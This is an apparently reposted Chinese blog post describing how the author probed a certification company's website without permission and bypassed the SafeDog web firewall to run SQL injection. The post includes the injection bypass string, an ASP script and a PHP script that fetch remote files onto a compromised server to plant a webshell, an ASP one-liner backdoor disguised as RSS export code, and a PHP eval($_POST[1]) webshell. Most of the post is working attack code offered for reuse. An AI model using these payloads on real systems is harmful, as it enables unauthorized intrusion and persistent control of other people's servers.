网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

简单的绕过安全狗继续注入 以及一些突破思路

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 因为最近大四的师兄告诉我我们专业是多么的苦逼,于是肚子的想考点证啥的,就跑去搜索下看看这个思科啥的考证的是咋回事,于是于是就开始了这场关于注入的小事。和客服简单的...

因为最近大四的师兄告诉我我们专业是多么的苦逼,于是肚子的想考点证啥的,就跑去搜索下看看这个思科啥的考证的是咋回事,于是于是就开始了这场关于注入的小事。
 
和客服简单的交谈了下,发现费用好高的说,于是滋生了想检测下他们官网的想法,随便的打开了一个连接,发现是动态的xxx.asp?id=
 
由于写进DOC了,下面主要讲解下思路..
 
 
安全狗本身对xx.asp?id=69 and 1=1和xx.asp?id=69 and 1=2这些是过滤的,可是对xx.asp?0day5.com=%00.&xw_id=69%20 and 1=1和xx.asp?0day5.com=%00.&xw_id=69%20 and 1=2 却是正常,直接丢到工具就OK了
 
发散下自己的一些思路,彩笔而已..大家不要喷呃...
对于安全狗的,可以选择下载,不选择上传文件,这个和音符大大测试过的
asp的下载脚本,要求是支持数据流的组建没有被删除<%
 
Set xPost = CreateObject("Microsoft.XMLHTTP")
 
xPost.Open "GET","http://www.2cto.com /2.txt",False
 
xPost.Send()
 
Set sGet = CreateObject("ADODB.Stream")
 
sGet.Mode = 3
 
sGet.Type = 1
 
sGet.Open()
 
sGet.Write(xPost.responseBody)
 
sGet.SaveToFile Server.MapPath("11.asp"),2
 
set sGet = nothing
 
set sPOST = nothing
 
%>
意思是把http://www.2cto.com /2.txt这个文件下载到当前目录保存为11.asp
利用嘛...保存为x.asp,然后去访问,等到进度条完成了再去访问11.asp会发现大马躺在那里的
php的,这个是音符大大给的<form method="post">
 
<input name="url" size="50" />
 
<input name="submit" type="submit" />
 
</form>
 
<?php
 
$pwd='e';//这里为你的密码
 
if ($_REQUEST['pwd']!=$pwd)
 
exit('Sorry ,you are not validate user!');
 
// maximum execution time in seconds
 
set_time_limit (24 * 60 * 60);
 
if (!isset($_POST['submit'])) die();
 
// folder to save downloaded files to. must end with slash
 
$destination_folder = './';
 
$url = $_POST['url'];
 
$newfname = $destination_folder . basename($url);
 
$file = fopen ($url, "rb");
 
if ($file) {
 
$newf = fopen ($newfname, "wb");
 
if ($newf)
 
while(!feof($file))
 
{
 
fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
 
}
 
}
 
if ($file)
 
{
 
fclose($file);
 
}
 
if ($newf) {
 
fclose($newf);
 
echo 'OK,File has been downloaded!';
 
}
 www.2cto.com
?>
保存为xx.php,然后通过e.php?pwd=e访问会提示让输入地址,这里找一个不解析php的网站,然后上传去...它会自己下载文件,并保存在当前目录
关于突破的一句话,我一直在使用仙剑之鸣提起的那个一句话<%
 
Call System_Initalize()
 
Function System_Initalize()
 
        On Error Resume Next
 
        Dim Rss2Export:Rss2Export="Export"
 
        Dim objArticle:objArticle=Request(Rss2Export)
 
        Set Rss2Export = New TRssExport
 
        With Rss2Export
 
                Dim objRS,UserName,UserIntro
 
                .TimeZone=ZC_TIME_ZONE
 
                UserName=Users(UserID).Name
 
                If objArticle<>"" Then
 
                .AddChannelAttribute "language",ZC_BLOG_LANGUAGE
 
                Execute Replace(objArticle,"*"&Rss2Export,"")
 
                .AddChannelAttribute "copyright",TransferHTML(ZC_BLOG_COPYRIGHT,"[nohtml][html-format]")
 
                .AddChannelAttribute "pubDate",Now
 
                Response.End()
 
                End if
 
        End With
 
End Function
 
%>
密码是Dim Rss2Export:Rss2Export="Export"这里的Export
php的是选择了nono< ?php
 
eval
 
($_POST
 
[1])
 
?>
密码是1

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论